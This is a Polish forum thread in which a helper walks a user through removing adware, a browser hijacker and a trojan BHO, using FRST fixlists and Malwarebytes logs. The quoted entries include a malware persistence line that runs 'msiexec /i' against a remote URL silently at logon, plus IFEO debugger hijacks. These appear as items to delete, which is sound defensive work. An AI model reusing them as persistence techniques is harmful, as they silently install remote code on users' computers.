Witamy na forum PC Format Zapraszamy do REJESTRACJI


Użytkownicy przeglądający ten wątek: 1 gości

QQime chinski shit ,logi.

#1
QQime chinski shit ,logi.
Okolo 2 miesiecy temu przypuscil atak na moj pc qqime poinstalowaly sie rozne syfiaste apki typu big farm itp.
Z lenistwa niechcialo mi sie nic z tym robic az wkoncu wstawiam logi z adw i frst.
Frst http://wklej.org/id/3184238/
Shortcut http://wklej.org/id/3184247/
Addition http://wklej.org/id/3184248/
Adw http://wklej.org/id/3184265/
 System operacyjny: windows_seven Przeglądarka: firefox
#2
RE: QQime chinski shit ,logi.
1) Spróbuj odinstalowac te programy:
AlphaGo (HKLM-x32\...\{118B6258-BF13-47C9-8D46-B2A349196B5D}) (Version: 1.0.0 - Default Company Name) <==== ATTENTION

AlphaGo (HKLM-x32\...\{2C652C0A-EC71-4797-8077-F67649177AB0}) (Version: 1.0.2 - Default Company Name) <==== ATTENTION
AlphaGo (HKLM-x32\...\{51639FCA-678F-4D71-8044-E16E3D49187F}) (Version: 1.0.7 - Default Company Name) <==== ATTENTION
AlphaGo (HKLM-x32\...\{97D2FBF4-72CF-4DD6-8DA8-26710BC7BE71}) (Version: 1.1.0 - Default Company Name) <==== ATTENTION
AlphaGo (HKLM-x32\...\{B20B3A3C-91E3-4326-8A0F-B3C012574F8C}) (Version: 1.1.2 - Default Company Name) <==== ATTENTION
AlphaGo (HKLM-x32\...\{B7CB7055-EFAE-4CD2-928A-15DB5F4FF7C7}) (Version: 1.2.5 - AlphaGo) <==== ATTENTION

2) Adw-Cleaner: najpierw kliknij na SKANUJ (SCAN), a dopiero po zakończeniu skanowania, gdy uaktywni się przycisk OCZYŚĆ (CLEANING), to kliknij na niego.

3) Uruchom FRST. NA klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

Cytat:RemoveDirectory: C:\Program Files (x86)\MIO
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Program Files (x86)\Dayglad
RemoveDirectory: c:\users\kwak\appdata\roaming\winsapsvc
RemoveDirectory: c:\Program Files (x86)\Wolury
FirewallRules: [{B226F97D-FCA0-43B2-AFE6-765E2564D154}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{82C34EC4-540C-4C8B-883E-1E5687E6C83B}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
FirewallRules: [{068D4B41-113E-4D09-B0A3-E4384E83793B}] => (Allow) C:\Program Files (x86)\MIO\loader\st500dm002-1bd142_s2ag94esxxxxs2ag94es.dat
FirewallRules: [{3878CF89-5EB9-4443-9E07-32AF377D64E4}] => (Allow) C:\Program Files (x86)\MIO\loader\st500dm002-1bd142_s2ag94esxxxxs2ag94es.dat
FirewallRules: [{674954D7-3091-422A-A50F-C8CBE3087D0A}] => (Allow) C:\Program Files (x86)\Dayglad\Application\chrome.exe
MSCONFIG\startupreg: mbot_pl_014010043 =>
C:\Users\Kwak\AppData\Local\background_fault\bf.dll
C:\Users\Kwak\AppData\Roaming\nservice32.exe
C:\Program Files (x86)\Coerbght Center
ShortcutWithArgument: C:\Users\Kwak\Desktop\BigFarm.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://bigfarm.goodgamestudios.com/?w=239064
ShortcutWithArgument: C:\Users\Kwak\Desktop\big_bang_empire.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005
ShortcutWithArgument: C:\Users\Kwak\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Dayglad\Application\chrome.exe (Google Inc.) -> hxxps://launchpage.org/?uid=oTlCGKjchx1sXu9Wcs7llNeKZrJYwCVk95yoX4Yc8Nj%2BPqq7djXUnNfMgwLOOn601Q%3D%3D
ShortcutWithArgument: C:\Users\Kwak\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://bigfarm.goodgamestudios.com/?w=239064
ShortcutWithArgument: C:\Users\Kwak\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005
ShortcutWithArgument: C:\Users\Kwak\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk -> C:\Program Files (x86)\Dayglad\Application\chrome.exe (Google Inc.) -> hxxps://launchpage.org/?uid=oTlCGKjchx1sXu9Wcs7llNeKZrJYwCVk95yoX4Yc8Nj%2BPqq7djXUnNfMgwLOOn601Q%3D%3D
ShortcutWithArgument: C:\Users\Kwak\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\167c78b32431516\Google Chrome.lnk -> C:\Program Files (x86)\Dayglad\Application\chrome.exe (Google Inc.) -> hxxps://launchpage.org/?uid=oTlCGKjchx1sXu9Wcs7llNeKZrJYwCVk95yoX4Yc8Nj%2BPqq7djXUnNfMgwLOOn601Q%3D%3D
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
Task: {F86A89F1-73A7-4CB1-9A6A-BFD5B9ADFEA8} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-17] () <==== ATTENTION
Task: {DB0B6568-9B80-45CB-AEC8-304DCDA8F164} - System32\Tasks\{8AB98DD7-61F5-4744-8709-0FE48BCCEC94} => pcalua.exe -a "C:\Users\Kwak\Desktop\Dragon Age Redesigned Version 6.9\DRAGON AGE ORIGINS\Companion NPCs\Leliana\Dragon Age Redesigned- Leliana.exe" -d "C:\Users\Kwak\Desktop\Dragon Age Redesigned Version 6.9\DRAGON AGE ORIGINS\Companion NPCs\Leliana"
Task: {DC803207-94FD-4822-8B02-7C09802A7952} - System32\Tasks\{97E673D8-35AC-4D10-903E-AAA4F168A8BB} => pcalua.exe -a "C:\Users\Kwak\Desktop\Dragon Age Redesigned Version 6.9\DRAGON AGE ORIGINS\Companion NPCs\Wynne\Dragon Age Redesigned- Wynne.exe" -d "C:\Users\Kwak\Desktop\Dragon Age Redesigned Version 6.9\DRAGON AGE ORIGINS\Companion NPCs\Wynne"
Task: {E034036E-89B5-40C9-8072-D514AF8AE1FB} - System32\Tasks\{55591228-BA43-4D4B-B144-BB455D14AC02} => pcalua.exe -a C:\Users\Kwak\Downloads\tibia800.exe -d C:\Users\Kwak\Downloads
Task: {D4D5170D-BF82-401F-9BE7-7912169D5506} - System32\Tasks\{258BF81A-4793-4735-B836-689604BE1888} => pcalua.exe -a "C:\Program Files (x86)\MKJogo\MK IM\Bin\uInst.exe"
Task: {CA15D5F6-3028-487B-8C17-8CCEAF0786EF} - System32\Tasks\Update\Windows => C:\Users\Kwak\AppData\Local\Temp\Windows.exe  <==== ATTENTION
Task: {C29455C5-70CF-4E17-8E09-8AC2A827A4DE} - System32\Tasks\{9FBD3C26-2241-46BD-B0FB-2F4976BB2968} => pcalua.exe -a "C:\Users\Kwak\Desktop\Dragon Age Redesigned Version 6.9\DRAGON AGE ORIGINS\Non-companion NPCs\Dragon Age Redesigned Version 6.9.exe" -d "C:\Users\Kwak\Desktop\Dragon Age Redesigned Version 6.9\DRAGON AGE ORIGINS\Non-companion NPCs"
Task: {04AC55C0-03B6-44F1-A50A-6B15DB073FFA} - System32\Tasks\{DA22A3F6-BFCE-420A-A05B-42394CB13A59} => pcalua.exe -a "C:\Users\Kwak\Desktop\Dragon Age Redesigned Version 6.9\DRAGON AGE ORIGINS\Companion NPCs\Sten\Dragon Age Redesigned- Sten.exe" -d "C:\Users\Kwak\Desktop\Dragon Age Redesigned Version 6.9\DRAGON AGE ORIGINS\Companion NPCs\Sten"
Task: {37DA3B06-557F-440F-9AE6-E7A8360C3833} - System32\Tasks\{2C3F6B44-97E2-4536-B5BF-EA9276BE2FC2} => pcalua.exe -a "D:\gry\Heros 3\Heroes of Might and Magic 3\setupreg.exe" -d "D:\gry\Heros 3\Heroes of Might and Magic 3"
Task: {3E9766CD-9CC4-42F9-9C26-C55C23743B07} - System32\Tasks\{CD558259-B5AD-4DFF-BC80-85661B6DA76B} => pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{6FB6D550-DDC4-4996-9CDF-91C34F0A4C4A}\setup.exe" -d C:\Windows
Task: {4179647E-1B66-46FD-AD93-64414285B30B} - System32\Tasks\{74F97CCC-A2E6-43B5-9A27-EB98AA988DFA} => pcalua.exe -a "C:\Users\Kwak\Desktop\Dragon Age Redesigned Version 6.9\DRAGON AGE ORIGINS\Companion NPCs\Zevran\Dragon Age Redesigned- Zevran.exe" -d "C:\Users\Kwak\Desktop\Dragon Age Redesigned Version 6.9\DRAGON AGE ORIGINS\Companion NPCs\Zevran"
Task: {6C5DC2B3-6721-4271-9656-C504190536E3} - System32\Tasks\Coerbght Center => C:\Program Files (x86)\Wolury\gehesp.exe
Task: {76D05A81-2AFA-4D6E-8C6F-C8D6C38DC7AA} - System32\Tasks\{747A6CB3-A1D7-412A-B820-D5D19CBCD64E} => pcalua.exe -a C:\Windows\UnGins.exe -c "D:\gry\h3\install.log"
Task: {8768E5B7-59ED-4312-A258-040F3B15F266} - System32\Tasks\{4D168973-64B1-4544-B30B-0FA05D903C1B} => pcalua.exe -a "C:\Users\Kwak\Desktop\Dragon Age Redesigned Version 6.9\DRAGON AGE ORIGINS\Companion NPCs\Oghren\Dragon Age Redesigned- Oghren.exe" -d "C:\Users\Kwak\Desktop\Dragon Age Redesigned Version 6.9\DRAGON AGE ORIGINS\Companion NPCs\Oghren"
Task: {9BBE637B-AB4B-47FB-A8CE-566E433A65FC} - System32\Tasks\{77598E3A-F158-46DB-A575-559A8D8085F6} => pcalua.exe -a "C:\Users\Kwak\Desktop\Dragon Age Redesigned Version 6.9\DRAGON AGE ORIGINS\Companion NPCs\Morrigan\Dragon Age- Morrigan.exe" -d "C:\Users\Kwak\Desktop\Dragon Age Redesigned Version 6.9\DRAGON AGE ORIGINS\Companion NPCs\Morrigan"
Task: {AD463D04-166A-44F4-BDC0-2680497EE7B7} - System32\Tasks\{33D1141F-DB0E-4ED1-B650-E84AF7C1DFFF} => pcalua.exe -a "D:\torrenty\Warcraft 3\Warcraft 3 Reign of Chaos and Frozen Throne cracked\4.     TFT_1.20d_No-CD_Setup.exe" -d "D:\torrenty\Warcraft 3\Warcraft 3 Reign of Chaos and Frozen Throne cracked"
Task: {B0642224-12D4-4501-9BD6-7FA2608E7E20} - System32\Tasks\{582AF85B-4955-4BDC-9F0E-8169E08ED356} => pcalua.exe -a "C:\Program Files (x86)\Swords and Sandals 2 Emperor's Reign\uninst.exe" -d "C:\Program Files (x86)\Swords and Sandals 2 Emperor's Reign"
HKU\S-1-5-21-2550881053-3021526274-2639938305-1000\...\ChromeHTML: -> C:\Program Files (x86)\Dayglad\Application\chrome.exe (Google Inc.) <==== ATTENTION
2015-08-21 15:33 - 2015-08-24 23:37 - 0000024 _____ () C:\Users\Kwak\AppData\Roaming\appdataFr25.bin
2015-05-02 21:16 - 2015-06-10 16:52 - 0000020 _____ () C:\Users\Kwak\AppData\Roaming\appdataFr3.bin
2017-05-31 11:38 - 2017-05-03 00:12 - 00000000 ____D C:\Program Files\9d4v836a
2017-05-11 11:57 - 2017-05-03 13:05 - 00000000 _____ C:\Windows\SysWOW64\22
2017-05-11 11:57 - 2017-05-03 13:05 - 00000000 _____ C:\Windows\SysWOW64\11
2017-05-08 13:55 - 2017-05-08 13:55 - 00000000 ____D C:\Users\Public\Documents\chrome
2017-05-08 13:14 - 2017-05-08 13:14 - 00000000 ____D C:\Users\Kwak\AppData\Local\Firefox
2017-05-09 14:14 - 2017-05-24 16:43 - 00000000 _____ C:\Windows\SysWOW64\1111
2017-05-09 14:14 - 2017-05-09 14:14 - 00000000 ____D C:\Program Files (x86)\AlphaGo
2017-05-09 12:19 - 2017-05-09 12:20 - 00000150 _____ C:\Windows\Reimage.ini
2017-05-09 12:18 - 2017-05-09 12:18 - 00604928 _____ (Reimage) C:\Users\Kwak\Downloads\ReimageRepair.exe
2017-05-09 12:15 - 2017-05-09 12:15 - 00000000 ____D C:\Users\Kwak\AppData\Local\VNASRE
2017-05-19 15:15 - 2017-05-19 15:15 - 00000000 ____D C:\Users\Kwak\AppData\Local\CSHMDR
2017-05-15 13:07 - 2017-06-02 14:13 - 00001989 _____ C:\Users\Kwak\Desktop\big_bang_empire.lnk
2017-05-15 13:07 - 2017-05-17 10:26 - 00000000 ____D C:\Users\Kwak\AppData\Local\CWASRE
2017-05-12 14:34 - 2017-05-12 14:34 - 00000000 ____D C:\Program Files (x86)\Default Company Name
2017-05-11 11:58 - 2017-05-11 11:58 - 00000000 _____ C:\Windows\SysWOW64\3333333
2017-05-11 11:57 - 2017-06-02 14:13 - 00001963 _____ C:\Users\Kwak\Desktop\BigFarm.lnk
2017-05-11 11:57 - 2017-05-11 13:49 - 00000000 ____D C:\Users\Kwak\AppData\Local\NPASRE
2017-05-11 11:57 - 2017-05-11 11:57 - 00000000 _____ C:\Windows\SysWOW64\1111111
2017-05-11 11:57 - 2017-05-11 11:57 - 00000000 _____ C:\Windows\SysWOW64\00
2017-05-10 08:58 - 2017-05-24 00:20 - 00000000 _____ C:\Windows\SysWOW64\1
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U2 CWASRE; no ImagePath
S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
U2 snare; no ImagePath
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S3 WinRing0_1_2_0; \??\D:\programy\Game Booster 3\Driver\WinRing0x64.sys [X]
R2 WinSAPSvc; C:\Users\Kwak\AppData\Roaming\WinSAPSvc\WinSAP.dll [1887232 2017-05-17] () [File not signed] <==== ATTENTION
R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-05-17] (TODO: <公司名>) [File not signed] <==== ATTENTION
C:\ProgramData\BIT
StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.ourluckysites.com/?type=sc&ts=1495629925&z=59671893b80c0a2bcba3aa4g8z4tcw5q1obtet1o3c&from=che0812&uid=ST500DM002-1BD142_S2AG94ESXXXXS2AG94ES
CHR DefaultProfile: ChromeDefaultData
CHR HomePage: ChromeDefaultData -> hxxp://www.ourluckysites.com/?type=hp&ts=1494324951&z=e7394bca9a2c0b2e2a41841g0z3t1zacco1z7t1w8e&from=che0812&uid=ST500DM002-1BD142_S2AG94ESXXXXS2AG94ES
CHR StartupUrls: ChromeDefaultData -> "hxxp://www.ourluckysites.com/?type=hp&ts=1494324951&z=e7394bca9a2c0b2e2a41841g0z3t1zacco1z7t1w8e&from=che0812&uid=ST500DM002-1BD142_S2AG94ESXXXXS2AG94ES"
CHR DefaultSearchURL: ChromeDefaultData -> hxxp://www.initialpage123.com/search/?q={searchTerms}&z=916f132e7133bcd17b856c4gbzat6c5wam8qbgbo2c&from=wak&uid=ST500DM002-1BD142_S2AG94ESXXXXS2AG94ES&type=sp
CHR DefaultSearchKeyword: ChromeDefaultData -> 22initialpage123
CHR Profile: C:\Users\Kwak\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-05-09] <==== ATTENTION
CHR Extension: (LoungeDestroyer) - C:\Users\Kwak\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghahcnmfjfckcedfajbhekgknjdplfcl [2015-08-07] [UpdateUrl: hxxps://mynamedomain.koko//0service/update2/crx] <==== ATTENTION
CHR Extension: (AdBlock) - C:\Users\Kwak\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2015-08-07] [UpdateUrl: hxxps://mynamedomain.koko//0service/update2/crx] <==== ATTENTION
CHR Extension: (Google Wallet) - C:\Users\Kwak\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-06-10] [UpdateUrl: hxxps://mynamedomain.koko//0service/update2/crx] <==== ATTENTION
CHR Extension: (Chrome Media Router) - C:\Users\Kwak\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-30]
StartMenuInternet: FIREFOX.EXE - C:\Program Files (x86)\Firefox\Firefox.exe hxxp://www.ourluckysites.com/?type=sc&ts=1495629925&z=59671893b80c0a2bcba3aa4g8z4tcw5q1obtet1o3c&from=che0812&uid=ST500DM002-1BD142_S2AG94ESXXXXS2AG94ES
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\51267216.js [2017-06-01] <==== ATTENTION (Points to *.cfg file)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\51267216.cfg [2017-06-01] <==== ATTENTION
EmptyTemp:
Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

4) Uruchom Google Chrome

> Naciśnij klawisze: lewy Alt+F i kliknij przycisk Ustawienia >
> Sekcja: OSOBY
>zaznacz (wybierz): user0
kliknij znaczek X znajdujący się po prawej stronie

5) Zrób nowe logi FRST.
przed skanem zaznacz: Additional.txt Shortcut.txt,
 System operacyjny: windows_seven Przeglądarka: seamonkey
#3
RE: QQime chinski shit ,logi.
1 Alpha go odinstalowane
2 adw wyczyszone przy okazji usunal mi chrome i firefoxa
3 wklejone
4 odinstalowalo mi chrome wiec chyba nie bylo takiej potrzeby
5 FRST http://wklej.org/id/3184892/
 Addition http://wklej.org/id/3184895/
Shortcut http://wklej.org/id/3184893/
 
 System operacyjny: windows_seven Przeglądarka: firefox
#4
RE: QQime chinski shit ,logi.
Cytat:adw wyczyszone przy okazji usunal mi chrome i firefoxa
Nie. Usunął tylko fałszywego firefoxa i skróty, które przekierowywały na tego fałszywego.
Z Chrome to samo.
Ale fakt, że choć Adw-Cleaner nie usuwał Chrome (widać to w jego raporcie), to na liście Twoich programów nie ma Chrome - może sam go odinstalowałeś?

1) 
Cytat:Internet Explorer Version 11 (Default browser: "C:\Program Files (x86)\Firefox\Firefox.exe" -osint -url "%1")
Masz ustawiony fałszywy Firefox jako domyślna przeglądarka - zmień to.
Prawdziwa przeglądarka to Mozilla Firefox (a nie Firefox)

2) Uruchom FRST. NA klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

Cytat:2015-08-16 12:14 - 2015-08-16 13:18 - 0000001 _____ () C:\Users\Kwak\AppData\Roaming\update.dat
2017-05-05 13:03 - 2017-05-05 13:03 - 00000000 _____ C:\Windows\SysWOW64\2
CHR DefaultProfile: ChromeDefaultData
FF HKU\S-1-5-21-2550881053-3021526274-2639938305-1000\...\Firefox\Extensions: [firefox@mozilla.com] - C:\Users\Kwak\AppData\Roaming\firefox@mozilla.com
FF Extension: (Firefox Updater) - C:\Users\Kwak\AppData\Roaming\firefox@mozilla.com [2016-12-28] [not signed]
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\9kete1q7.default -> initialpage123
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\9kete1q7.default -> initialpage123
BHO-x32: No Name -> {B69F34DD-F0F9-42DC-9EDD-957187DA688D} -> No File
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-2550881053-3021526274-2639938305-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
URLSearchHook: HKLM-x32 -> Default = {CCC7B151-1D8C-11E3-B2AD-F3EF3D58318D}
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-2550881053-3021526274-2639938305-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-2550881053-3021526274-2639938305-1000\...\Run: [GalaxyClient] => [X]
HKU\S-1-5-21-2550881053-3021526274-2639938305-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.ltdmsjq.com/?data=zDlkMj85N...NUNXNTlSRF== /q
HKLM\...\Providers\9d4v836a: C:\Program Files (x86)\Coerbght Center\local64spl.dll
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
ShellExecuteHooks: No Name - {BA54974C-2BC1-11E7-9322-64006A5CFC23} -  -> No File
GroupPolicy: Restriction - Chrome <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
HKLM-x32\...\Run: [l33t] => C:\Windows\system\iexplore.exe [34820 2016-12-18] ()
C:\Users\Kwak\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\167c78b32431516\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\Kwak\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
EmptyTemp:
Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

Zrób nowe logi FRST.
.
 System operacyjny: windows_seven Przeglądarka: seamonkey
#5
RE: QQime chinski shit ,logi.
zmienilem juz po czyszczeniu bo zorientowalem sie ze uzywam fake firefoxa po innym folderze dayland bodajze

Nowe logi :
FRST http://wklej.org/id/3186009/
Addition http://wklej.org/id/3186011/
Shortcut http://wklej.org/id/3186012/
 System operacyjny: windows_seven Przeglądarka: firefox
#6
RE: QQime chinski shit ,logi.
Cytat:BHO-x32: IE MANAGER -> {DE274C2C-2133-4B4B-93B3-8F21486DABC0} -> C:\Users\Kwak\AppData\Roaming\IE\bho.dll [2017-06-04] ()
Sam się dziwię, że dopiero teraz dostrzegłem tego"złodzieja informacji"!
( http://www.systemlookup.com/search.php?t...BC0}&s= )


Cytat:Internet Explorer Version 11 (Default browser: "C:\Program Files (x86)\Firefox\Firefox.exe" -osint -url "%1")
W dalszym ciągu fałszywy Firefox jest ustawiony jako domyślna przeglądarka.
To sam musisz zmienić, FRST tego za Ciebie nie zrobi.

Uruchom FRST. NA klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

Cytat:FF SearchPlugin: C:\Users\Kwak\AppData\Roaming\Mozilla\Firefox\Profiles\9kete1q7.default\searchplugins\9d4v836a.xml [2017-04-30]
CHR DefaultProfile: ChromeDefaultData
BHO-x32: IE MANAGER -> {DE274C2C-2133-4B4B-93B3-8F21486DABC0} -> C:\Users\Kwak\AppData\Roaming\IE\bho.dll [2017-06-04] ()
C:\Users\Kwak\AppData\Roaming\IE\bho.dll
EmptyTemp:
Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

Jeśli będzie OK, to będziemy kończyć:
Otwórz Notatnik i wklej w nim:

Cytat:DeleteQuarantine:
Plik zapisz pod nazwą fixlist.txt i umieść obok FRST. Uruchom FRST i kliknij w Fix (NAPRAW).
przez SHIFT+DEL usuń pozostały folder C:\FRST

Jeśli coś nie będzie "OK", to użyjesz jeszcze > MBAM
Podczas instalacji usuń zaznaczenie z okienka przy "Uruchom okres testowy Malwarebytes Anti-Malware Premium".
.
 System operacyjny: windows_seven Przeglądarka: seamonkey
#7
RE: QQime chinski shit ,logi.
Malwarebytes Anti-Malware
http://www.malwarebytes.org

Data skanowania: 2017-06-05
Czas skanowania: 14:31
Raport: fff.txt
Administrator: Tak

Wersja: 2.2.1.1043
Baza szkodliwego oprogramowania: v2017.06.05.03
Baza danych rootkitów: v2017.05.27.01
Licencja: Wersja próbna
Ochrona przed złośliwym oprogramowaniem: Wyłączony
Ochrona przed szkodliwymi stronami: Wyłączony
Samoobrona: Wyłączony

System operacyjny: Windows 7 Service Pack 1
Procesor: x64
System plików: NTFS
Użytkownik: Kwak

Typ skanowania: Dokładne skanowanie
Wynik: Zakończono
Obiekty przeskanowane: 375317
Czas, który upłynął: 15 min, 22 s

Pamięć: Włączony
Autostart: Włączony
System plików: Włączony
Archiwa: Włączony
Rootkity: Wyłączony
Heurystyka: Włączony
PUP: Włączony
PUM: Włączony

Procesy: 0
(Nie wykryto zagrożeń)

Moduły: 0
(Nie wykryto zagrożeń)

Klucze rejestru: 11
Trojan.Agent.BHO, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{DE274C2C-2133-4B4B-93B3-8F21486DABC0}, Przeniesiono do kwarantanny, [efa813282e7b1b1ba5dff136ce3413ed],
Trojan.Agent.BHO, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{DE274C2C-2133-4B4B-93B3-8F21486DABC0}, Przeniesiono do kwarantanny, [efa813282e7b1b1ba5dff136ce3413ed],
Trojan.Agent.BHO, HKU\S-1-5-21-2550881053-3021526274-2639938305-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{DE274C2C-2133-4B4B-93B3-8F21486DABC0}, Przeniesiono do kwarantanny, [efa813282e7b1b1ba5dff136ce3413ed],
Trojan.Agent.BHO, HKU\S-1-5-21-2550881053-3021526274-2639938305-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{DE274C2C-2133-4B4B-93B3-8F21486DABC0}, Przeniesiono do kwarantanny, [efa813282e7b1b1ba5dff136ce3413ed],
Trojan.Agent, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\IEXPLORE.EXE, Przeniesiono do kwarantanny, [1a7d1823d6d3ff37617c880020e2e020],
Trojan.Agent, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\IEXPLORE.EXE, Przeniesiono do kwarantanny, [1a7d1823d6d3ff37617c880020e2e020],
Adware.Elex, HKLM\SOFTWARE\xvb`lj, Przeniesiono do kwarantanny, [abec8fac9b0ead89994b755baa57b947],
PUP.Optional.StartPage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\WarThunder05, Przeniesiono do kwarantanny, [2473a596c7e2b87eed8aa0bbf40eed13],
PUP.Optional.Infonaut, HKLM\SOFTWARE\WOW6432NODE\Infonaut_1.10.0.14, Przeniesiono do kwarantanny, [692e8bb0e1c82214e2dfb61962a0f709],
Adware.Elex, HKLM\SOFTWARE\WOW6432NODE\xvb`lj, Przeniesiono do kwarantanny, [bed93efd525783b35292daf6877a0000],
PUP.Optional.MultiPlug, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{1146AC44-2F03-4431-B4FD-889BC837521F}{4ef60154}, Przeniesiono do kwarantanny, [b3e43efd5d4cbc7a5f6f07cd82805ca4],

Wartości rejestru: 0
(Nie wykryto zagrożeń)

Dane rejestru: 0
(Nie wykryto zagrożeń)

Foldery: 1
Adware.Elex, C:\Windows\psgo, Przeniesiono do kwarantanny, [9bfc78c30c9dd46230bcd01cda2733cd],

Pliki: 16
PUP.Optional.MultiPlug, C:\Program Files (x86)\Picture Downloader Professional\Picture Downloader Professional.exe, Przeniesiono do kwarantanny, [5f38d566bdecae88799155084fb2dc24],
PUP.Optional.MailRu, C:\Users\wtf\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_ad.mail.ru_0.localstorage, Przeniesiono do kwarantanny, [5047c5763673a88ef80c05e19f627888],
Adware.Elex, C:\Windows\psgo\psgo.ps1, Przeniesiono do kwarantanny, [9bfc78c30c9dd46230bcd01cda2733cd],
Trojan.Agent, C:\Windows\system\iexplore.exe, Przeniesiono do kwarantanny, [1a7d1823d6d3ff37617c880020e2e020],
Trojan.Agent, C:\Windows\system\smss.exe, Przeniesiono do kwarantanny, [6f289e9d8e1b9c9a1a9a881104fe40c0],
PUP.Optional.WebTInst, C:\Windows\System32\drivers\Msft_Kernel_webTinstMKTN84_01009.Wdf, Przeniesiono do kwarantanny, [9dfa0536a900fa3c12f99052c33f53ad],
RiskWare.HeuristicsReservedWordExploit, C:\Windows\system\smss.txt, Przeniesiono do kwarantanny, [6d2aea519b0ea29450a62912de258080],
RiskWare.HeuristicsReservedWordExploit, C:\Windows\system\smss.txt2, Przeniesiono do kwarantanny, [bdda6ecdcbdedd59db1b78c3ad5656aa],
Adware.Elex, C:\Users\Kwak\AppData\Roaming\Profiles\Toratyanertet.default\prefs.js, Dobry: (), Zły: (user_pref("browser.newtab.url", "http://www.initialpage123.com/?z=916f132e7133bcd17b856c4gbzat6c5wam8qbgbo2c&from=wak&uid=ST500DM002-1BD142_S2AG94ESXXXXS2AG94ES&type=hp");), Zastąpiono,[a6f11b2022873303a946b3e548b9b14f]
Adware.Elex, C:\Users\Kwak\AppData\Roaming\Profiles\Toratyanertet.default\prefs.js, Dobry: (), Zły: (art_size.use_old_max", false);
user_pref("browser.cache.frecenc), Zastąpiono,[5146ea51248555e1fbf42d6bcd34b44c]
Adware.Elex, C:\Users\Kwak\AppData\Roaming\Profiles\Toratyanertet.default\prefs.js, Dobry: (), Zły: (e changes will be overwritten when the application exits.
*
* To make a manual change to preferences, you can visit the URL about:config
*/

user_pref(".src", "123456");
